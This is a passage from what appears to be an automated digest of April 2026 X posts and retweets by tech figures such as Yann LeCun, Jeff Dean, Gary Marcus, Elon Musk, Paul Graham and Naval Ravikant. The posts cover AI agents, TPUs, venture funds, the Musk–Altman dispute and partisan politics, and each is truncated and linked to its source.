of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://x.com/ylecun/status/2048469956627468510)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://x.com/ylecun/status/2048453901930660058)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://x.com/ylecun/status/2048432684930654430)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://x.com/ylecun/status/2048399621492236615)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://x.com/ylecun/status/2048293118781296734)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://x.com/ylecun/status/2048118689258487857)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://x.com/ylecun/status/2048069805807128734)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://x.com/ylecun/status/2047780272297382384)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://x.com/ylecun/status/2047760455679246500)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://x.com/ylecun/status/2047733594064408894)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://x.com/ylecun/status/2047697898989572176)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://x.com/ylecun/status/2047680485208531152)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://x.com/ylecun/status/2047676640059154653)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://x.com/ylecun/status/2047636569767419951)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://x.com/ylecun/status/2047624126047670758)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://x.com/ylecun/status/2047565736382534091)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://x.com/ylecun/status/2047454244781818205)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://x.com/ylecun/status/2047378161860776085)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://x.com/ylecun/status/2047321581966291154)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://x.com/JeffDean/status/2047408945950802186)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://x.com/JeffDean/status/2047407537566495033)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://x.com/JeffDean/status/2047405389856297387)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://x.com/JeffDean/status/2047403921912873257)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://x.com/JeffDean/status/2047339995682529313)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://x.com/JeffDean/status/2046673188193701901)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://x.com/JeffDean/status/2046635685206208533)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://x.com/JeffDean/status/2046632664493384060)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://x.com/JeffDean/status/2046344875994739028)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://x.com/soumithchintala/status/2047191747793649805)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://x.com/soumithchintala/status/2046282944139215141)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(20 条)\n\n**[2026-04-27T15:50:31+00:00]**\n> If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say…\n[原文链接](https://x.com/GaryMarcus/status/2048791912149295182)\n\n**[2026-04-27T15:33:34+00:00]**\n> R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n[原文链接](https://x.com/GaryMarcus/status/2048787646206677207)\n\n**[2026-04-27T15:31:37+00:00]**\n> This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.\n[原文链接](https://x.com/GaryMarcus/status/2048787157536653627)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://x.com/GaryMarcus/status/2048771044987777428)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://x.com/GaryMarcus/status/2048757233174122827)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://x.com/GaryMarcus/status/2048746152749846549)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://x.com/GaryMarcus/status/2048742983684784239)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://x.com/GaryMarcus/status/2048739005525877072)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://x.com/GaryMarcus/status/2048608025464705084)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://x.com/GaryMarcus/status/2048593283639894520)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://x.com/GaryMarcus/status/2048589239915577837)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://x.com/GaryMarcus/status/2048582672163995766)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://x.com/GaryMarcus/status/2048580122521780676)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://x.com/GaryMarcus/status/2048579079121555764)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://x.com/GaryMarcus/status/2048578055283880296)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://x.com/GaryMarcus/status/2048570082843082905)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://x.com/GaryMarcus/status/2048567837221089669)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://x.com/GaryMarcus/status/2048558998325166498)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://x.com/GaryMarcus/status/2048553390540734479)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://x.com/GaryMarcus/status/2048552931923013916)\n\n---\n\n### ✅ @elonmusk — Elon Musk(19 条)\n\n**[2026-04-27T16:54:21+00:00]**\n> Calling him “Scam” Altman is accurate. This is very much worth reading.\n[原文链接](https://x.com/elonmusk/status/2048807976991850953)\n\n**[2026-04-27T16:39:59+00:00]**\n> RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major report talked to over 10…\n[原文链接](https://x.com/elonmusk/status/2048804363595059425)\n\n**[2026-04-27T16:31:33+00:00]**\n> Exactly\n[原文链接](https://x.com/elonmusk/status/2048802239272169582)\n\n**[2026-04-27T16:30:27+00:00]**\n> Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Com…\n[原文链接](https://x.com/elonmusk/status/2048801964457140540)\n\n**[2026-04-27T16:21:30+00:00]**\n> Scam Altman\n[原文链接](https://x.com/elonmusk/status/2048799712375902624)\n\n**[2026-04-27T15:56:52+00:00]**\n> RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n[原文链接](https://x.com/elonmusk/status/2048793511701717143)\n\n**[2026-04-27T15:26:33+00:00]**\n> RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help humanity.\" \"He has these …\n[原文链接](https://x.com/elonmusk/status/2048785882950549854)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://x.com/elonmusk/status/2048783014075777369)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://x.com/elonmusk/status/2048777628019032335)\n\n**[2026-04-27T12:50:55+00:00]**\n> RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial. Two opposing worldviews. Sam Altman transformed a non-profit organization into one of the world's most profitable companies…\n[原文链接](https://x.com/elonmusk/status/2048746715805581608)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://x.com/elonmusk/status/2048744214230712500)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://x.com/elonmusk/status/2048727747954868342)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://x.com/elonmusk/status/2048720909809156378)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://x.com/elonmusk/status/2048600964102246438)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://x.com/elonmusk/status/2048589691054694406)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://x.com/elonmusk/status/2048543344746250466)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://x.com/elonmusk/status/2048535299102265720)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://x.com/elonmusk/status/2048512831692452091)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://x.com/elonmusk/status/2048435593244237849)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://x.com/paulg/status/2048704073356935676)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://x.com/paulg/status/2048701354672050286)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://x.com/paulg/status/2048677984106664227)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://x.com/paulg/status/2048615296613937201)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://x.com/paulg/status/2048413815675539816)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://x.com/paulg/status/2048413578789634100)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://x.com/paulg/status/2048411898081583547)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://x.com/paulg/status/2048411021329453562)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://x.com/paulg/status/2048396013816152216)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://x.com/paulg/status/2048370801833828507)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://x.com/paulg/status/2048043843690561556)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://x.com/paulg/status/2048024967996993760)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://x.com/paulg/status/2048017824895909901)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://x.com/paulg/status/2048017345000415744)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://x.com/paulg/status/2047992864118894954)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://x.com/paulg/status/2047957234664030380)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://x.com/paulg/status/2047944827887591681)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://x.com/paulg/status/2047942555254288757)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://x.com/paulg/status/2047941243234107691)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://x.com/paulg/status/2047761493274571036)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://x.com/naval/status/2047481012826124516)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://x.com/naval/status/2047471220451578132)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://x.com/naval/status/2047334901033123913)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://x.com/naval/status/2046991137022648800)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://x.com/naval/status/2046961436593713241)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-27T08:14:21+00:00]**\n> 😳\n[原文链接](https://x.com/pmarca/status/2048677114480873657)\n\n**[2026-04-27T08:07:29+00:00]**\n> cc @BrendanEich\n[原文链接](https://x.com/pmarca/status/2048675385119019444)\n\n**[2026-04-27T08:04:13+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048674564314685477)\n\n**[2026-04-27T08:01:44+00:00]**\n> But \"A Disservice To Those Who Are Watching\" is the name of this show!\n[原文链接](https://x.com/pmarca/status/2048673940072251670)\n\n**[2026-04-27T07:59:56+00:00]**\n> cc @elonmusk\n[原文链接](https://x.com/pmarca/status/2048673488383447437)\n\n**[2026-04-27T04:43:41+00:00]**\n> When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\n[原文链接](https://x.com/pmarca/status/2048624098398650608)\n\n**[2026-04-27T04:32:43+00:00]**\n> Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"\n[原文链接](https://x.com/pmarca/status/2048621340408844368)\n\n**[2026-04-27T04:29:26+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2048620511912194339)\n\n**[2026-04-27T04:10:44+00:00]**\n> The apps can rewrite the files. 👀\n[原文链接](https://x.com/pmarca/status/2048615807190769738)\n\n**[2026-04-27T04:07:00+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048614869352714619)\n\n**[2026-04-27T04:06:10+00:00]**\n> 🇺🇸\n[原文链接](https://x.com/pmarca/status/2048614659595583651)\n\n**[2026-04-27T04:04:46+00:00]**\n> Many such cases (in the universe).\n[原文链接](https://x.com/pmarca/status/2048614305705386433)\n\n**[2026-04-27T03:56:11+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2048612144871264609)\n\n**[2026-04-27T03:49:14+00:00]**\n> Self recommending!\n[原文链接](https://x.com/pmarca/status/2048610397243265189)\n\n**[2026-04-27T03:01:18+00:00]**\n> Self recommending recommending.\n[原文链接](https://x.com/pmarca/status/2048598334492033455)\n\n**[2026-04-27T02:57:11+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048597298150875169)\n\n**[2026-04-27T02:34:50+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048591674688037210)\n\n**[2026-04-27T02:25:08+00:00]**\n> Overheard in Silicon Valley: \"Did a Claw post this?\"\n[原文链接](https://x.com/pmarca/status/2048589233095643240)\n\n**[2026-04-27T01:20:46+00:00]**\n> Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"\n[原文链接](https://x.com/pmarca/status/2048573035616375134)\n\n**[2026-04-26T21:32:43+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048515643268567431)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(2 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://x.com/morganhousel/status/2047013991046881663)\n\n**[2026-04-21T03:24:00+00:00]**\n> RT by @morganhousel: I’m in love with this sentence: “The best math you can learn is how to calculate the future cost of current decisions.”\n[原文链接](https://x.com/morganhousel/status/2046429717834654025)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://x.com/eladgil/status/2048230781739581745)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://x.com/eladgil/status/2047421448449630379)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://x.com/eladgil/status/2047373700643844303)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://x.com/eladgil/status/2047365014500389353)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 